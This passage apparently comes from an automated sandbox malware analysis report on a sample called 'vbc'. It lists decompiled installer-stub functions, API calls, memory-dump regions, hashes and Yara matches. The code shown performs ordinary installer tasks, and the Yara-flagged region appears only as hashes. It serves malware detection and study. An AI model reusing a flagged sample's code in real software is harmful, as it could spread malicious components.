                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404499(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404499(_t167);
                                                					E004044CE(_t166);
                                                					_t138 = E0040690A(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00404500(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x0040498a
                                                0x00404990
                                                0x00404996
                                                0x0040499a
                                                0x0040499d
                                                0x004049a3
                                                0x004049b1
                                                0x004049b4
                                                0x004049bc
                                                0x004049c2
                                                0x004049c2
                                                0x004049ce
                                                0x004049d1
                                                0x00404a3f
                                                0x00404a46
                                                0x00404b1d
                                                0x00404b24
                                                0x00404b33
                                                0x00404b33
                                                0x00404b37
                                                0x00404b41
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b50
                                                0x00404b5e
                                                0x00404b65
                                                0x00404b6c
                                                0x00404b6f
                                                0x00404bab
                                                0x00404bad
                                                0x00404bb3
                                                0x00404bb8
                                                0x00404bbc
                                                0x00404bbe
                                                0x00404bbe
                                                0x00404bda
                                                0x00000000
                                                0x00404bdc
                                                0x00404bdf
                                                0x00404bed
                                                0x00404bf3
                                                0x00404bf4
                                                0x00404bf7
                                                0x00404bfa
                                                0x00000000
                                                0x00404bfa
                                                0x00404b71
                                                0x00404b73
                                                0x00404b77
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b79
                                                0x00404b79
                                                0x00404b86
                                                0x00404b8b
                                                0x00000000
                                                0x00000000
                                                0x00404b8f
                                                0x00404b91
                                                0x00404b91
                                                0x00404b9a
                                                0x00404b9c
                                                0x00404ba1
                                                0x00404ba4
                                                0x00404ba9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404ba9
                                                0x00404c06
                                                0x00404c10
                                                0x00404c13
                                                0x00404c16
                                                0x00404c1d
                                                0x00404c1d
                                                0x00404c1f
                                                0x00404c1f
                                                0x00404c24
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c35
                                                0x00404c37
                                                0x00404c42
                                                0x00404c42
                                                0x00404c37
                                                0x00404c52
                                                0x00404c5c
                                                0x00404c64
                                                0x00404c7f
                                                0x00404c66
                                                0x00404c6f
                                                0x00404c6f
                                                0x00404c64
                                                0x00404c84
                                                0x00404c89
                                                0x00404c8e
                                                0x00404c97
                                                0x00404c97
                                                0x00404ca0
                                                0x00404ca2
                                                0x00404ca2
                                                0x00404cae
                                                0x00404cb6
                                                0x00404cc0
                                                0x00404cc0
                                                0x00404cc5
                                                0x00000000
                                                0x00404cc5
                                                0x00404b6f
                                                0x00404b26
                                                0x00404b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b2d
                                                0x00404a4c
                                                0x00404a55
                                                0x00404a6f
                                                0x00404a74
                                                0x00404a7e
                                                0x00404a85
                                                0x00404a91
                                                0x00404a94
                                                0x00404a97
                                                0x00404a9e
                                                0x00404aa6
                                                0x00404aa9
                                                0x00404aad
                                                0x00404ab4
                                                0x00404abc
                                                0x00404b16
                                                0x00404abe
                                                0x00404abf
                                                0x00404ac6
                                                0x00404ad0
                                                0x00404ad8
                                                0x00404ae5
                                                0x00404af9
                                                0x00404afd
                                                0x00404afd
                                                0x00404af9
                                                0x00404b02
                                                0x00404b0f
                                                0x00404b0f
                                                0x00404abc
                                                0x00000000
                                                0x00404a74
                                                0x00404a62
                                                0x00000000
                                                0x00000000
                                                0x00404a68
                                                0x00000000
                                                0x004049d3
                                                0x004049e0
                                                0x004049e9
                                                0x004049f6
                                                0x004049f6
                                                0x004049fd
                                                0x00404a03
                                                0x00404a0c
                                                0x00404a0f
                                                0x00404a12
                                                0x00404a1a
                                                0x00404a1d
                                                0x00404a20
                                                0x00404a26
                                                0x00404a2d
                                                0x00404a34
                                                0x00404ccb
                                                0x00404cdd
                                                0x00404a3a
                                                0x00404a3d
                                                0x00000000
                                                0x00404a3d
                                                0x00404a34

                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                • SetWindowTextW.USER32 ref: 00404A03
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                • lstrcatW.KERNEL32 ref: 00404AFD
                                                • SetDlgItemTextW.USER32 ref: 00404B0F
                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E
                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                • MulDiv.KERNEL32 ref: 00404BED
                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$Call
                                                • API String ID: 2624150263-209694386
                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$8hpI$P\%$Tf{$ps
                                                • API String ID: 0-29898945
                                                • Opcode ID: 90aff934d8521453c4a3b2b9eea2b1725dd7122bb96779662960a7341ba6b9d1
                                                • Instruction ID: 0636f79cb054e801c633958071051a8153c3a29a848aab6cbd050cb3c486486a
                                                • Opcode Fuzzy Hash: 90aff934d8521453c4a3b2b9eea2b1725dd7122bb96779662960a7341ba6b9d1
                                                • Instruction Fuzzy Hash: 26820DB2A043899FDB74DF29CD947DABBB2BF49300F45812EDD899B610D7309A81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$6@&$P\%
                                                • API String ID: 0-2798541830
                                                • Opcode ID: 6a2f67cae807ac88c083772f4e83bfefdd33a8d9e925326edb89a785ed1fb289
                                                • Instruction ID: d796cf9c6f234d584be650b05c78521aca8304ee9739a9b1cc2b760b6e849db4
                                                • Opcode Fuzzy Hash: 6a2f67cae807ac88c083772f4e83bfefdd33a8d9e925326edb89a785ed1fb289
                                                • Instruction Fuzzy Hash: 0F72FDB26043499FDB75DF39CD84BDABBA2FF49310F454529EE898B620D3309A81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: c9c47ac97d7de00376b07412a144b28bb5ad8bbc89e2d85b2f4f58bb68683a4c
                                                • Instruction ID: 8008f440cb9a4d2ce09c208016e6cc75d00cc286e7e8bce49b15cf607df1abac
                                                • Opcode Fuzzy Hash: c9c47ac97d7de00376b07412a144b28bb5ad8bbc89e2d85b2f4f58bb68683a4c
                                                • Instruction Fuzzy Hash: 2EC20F716083858FDB35DF38C9987DABBA2BF56310F49826EDD898F255D3308A41CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 2167126740-482672958
                                                • Opcode ID: f8d01071e94bcd24c35772704d0562e5cc3dfb78d629959457ae7c523e5fd2bb
                                                • Instruction ID: 3cc35a152522d1ee8307ca1430d9937def5726ed479eee7b57a94012ad89e4ca
                                                • Opcode Fuzzy Hash: f8d01071e94bcd24c35772704d0562e5cc3dfb78d629959457ae7c523e5fd2bb
                                                • Instruction Fuzzy Hash: 6652FBB260434A9FDB74DF39CD847DABBB6FF89300F458529DE899B614D3708A818B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: c50be60eaccf535e486b318b32f84e375b7344e1c59063dec1baa4650f8f8cbb
                                                • Instruction ID: 771e7c3a057a0bcdfdd09f0aa1364be29000a2ea204793a305df7d2140a8704b
                                                • Opcode Fuzzy Hash: c50be60eaccf535e486b318b32f84e375b7344e1c59063dec1baa4650f8f8cbb
                                                • Instruction Fuzzy Hash: 1952FBB260434A9FDB749F39CD947DABBB6FF98300F468529DD899B610D3308A818B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: 2a66057bcfff3eca049a8c055e4951c708c4e72b7937845803f7fa9c1f1a3b5a
                                                • Instruction ID: e4ffbf5a93c3bd613a1b0849ce2e8f38885cd9dcabbbc79ec97b7ec000ee6d6c
                                                • Opcode Fuzzy Hash: 2a66057bcfff3eca049a8c055e4951c708c4e72b7937845803f7fa9c1f1a3b5a
                                                • Instruction Fuzzy Hash: DB52FCB260434A9FDB749F39CD947DABBB6FF99300F458129DE899B610D3309A81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: 1da5c08abdb73416ddf91a32bfeba23cf4cca90a1ed96fb46bd3a31a54682880
                                                • Instruction ID: 7f80df9bf12c9ed4a4f69cdca11dac7fce1aa2f2faa5f8711ced5c826ffe1559
                                                • Opcode Fuzzy Hash: 1da5c08abdb73416ddf91a32bfeba23cf4cca90a1ed96fb46bd3a31a54682880
                                                • Instruction Fuzzy Hash: CA32EBB260434A9FDB759F29CD947DABBA2FF49300F458529ED89CB214D3309A818B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: 8a8544d4520a0bb516c9f92971834efe776e1bf770d367a4bb41b92f7c7205a8
                                                • Instruction ID: 6442a3fff7174fb138c19f54a23ff7237f3465671308d61b23a5eca3278bae36
                                                • Opcode Fuzzy Hash: 8a8544d4520a0bb516c9f92971834efe776e1bf770d367a4bb41b92f7c7205a8
                                                • Instruction Fuzzy Hash: AD32EBB260434A9FDB759F29CD957DABBB2FF89300F458529ED89CB214D3309A81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1kmu$3|$P\%
                                                • API String ID: 0-482672958
                                                • Opcode ID: ec849b69943e764024cf14733bd7f2a233b547c67dc74b1daf5f85ceead807c5
                                                • Instruction ID: 8a10cad6fa5b154117c3946788311909bd30a910a7c77f01b359f1310c114d11
                                                • Opcode Fuzzy Hash: ec849b69943e764024cf14733bd7f2a233b547c67dc74b1daf5f85ceead807c5
                                                • Instruction Fuzzy Hash: 1E12FBB260434A9FDB759F28CD547EA7BA2FF99300F45452DEE89CB210D3308A81CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Tf{$ps
                                                • API String ID: 0-4061433262
                                                • Opcode ID: cfde5dffd4d5bfe095687e26d89c5491e2683a496ffc06064f1ddebaa4a11e8f
                                                • Instruction ID: 615a07d6c3ca23b24fd1314cf33ecd0fb44d4027a8ad7fcd60cae2a3f7d9fd6c
                                                • Opcode Fuzzy Hash: cfde5dffd4d5bfe095687e26d89c5491e2683a496ffc06064f1ddebaa4a11e8f
                                                • Instruction Fuzzy Hash: DC51C2B2A08389EFDB74DF25CA917EA77B2BF19340F55011ADD4A6B700C730AA41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID:
                                                • API String ID: 542301482-0
                                                • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: S#b5
                                                • API String ID: 0-3280947951
                                                • Opcode ID: 239ab1a697d507770c36b034a1e3cbf95aa6fd79178c4af3c31c964654af0500
                                                • Instruction ID: 4c8ee622412ebd24767040b5e6a1f6d199ec5451ac527ea49a04493fd2fe44a2
                                                • Opcode Fuzzy Hash: 239ab1a697d507770c36b034a1e3cbf95aa6fd79178c4af3c31c964654af0500
                                                • Instruction Fuzzy Hash: CCC1BC3660038A8FDF34DF64CD90BEE36A6BF49310F04856EED8E9B254D7315A818B56
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E0040653D();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}




                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 5vC
                                                • API String ID: 0-1833372238
                                                • Opcode ID: c0fb7f8c20bcec286c039c604340db51ae098581390d5afe2710ea2e0e0bcbfd
                                                • Instruction ID: 74cf538a605209e41dd2524b3eca378031cb4a12cd8d6df66cb67931fdfc5f0f
                                                • Opcode Fuzzy Hash: c0fb7f8c20bcec286c039c604340db51ae098581390d5afe2710ea2e0e0bcbfd
                                                • Instruction Fuzzy Hash: AA1123B751228C4FEF788E7C9C957DA37AAAF89394F15002ADD0EDB390D7308A428641
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00406D85(signed int __ebx, signed int* __esi) {
                                                				signed int _t396;
                                                				signed int _t425;
                                                				signed int _t442;
                                                				signed int _t443;
                                                				signed int* _t446;
                                                				void* _t448;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t446 = __esi;
                                                					_t425 = __ebx;
                                                					if( *(_t448 - 0x34) == 0) {
                                                						break;
                                                					}
                                                					L55:
                                                					__eax =  *(__ebp - 0x38);
                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                					__ecx = __ebx;
                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                					__ebx = __ebx + 8;
                                                					while(1) {
                                                						L56:
                                                						if(__ebx < 0xe) {
                                                							goto L0;
                                                						}
                                                						L57:
                                                						__eax =  *(__ebp - 0x40);
                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                						__ecx = __eax;
                                                						__esi[1] = __eax;
                                                						__ecx = __eax & 0x0000001f;
                                                						if(__cl > 0x1d) {
                                                							L9:
                                                							_t443 = _t442 | 0xffffffff;
                                                							 *_t446 = 0x11;
                                                							L10:
                                                							_t446[0x147] =  *(_t448 - 0x40);
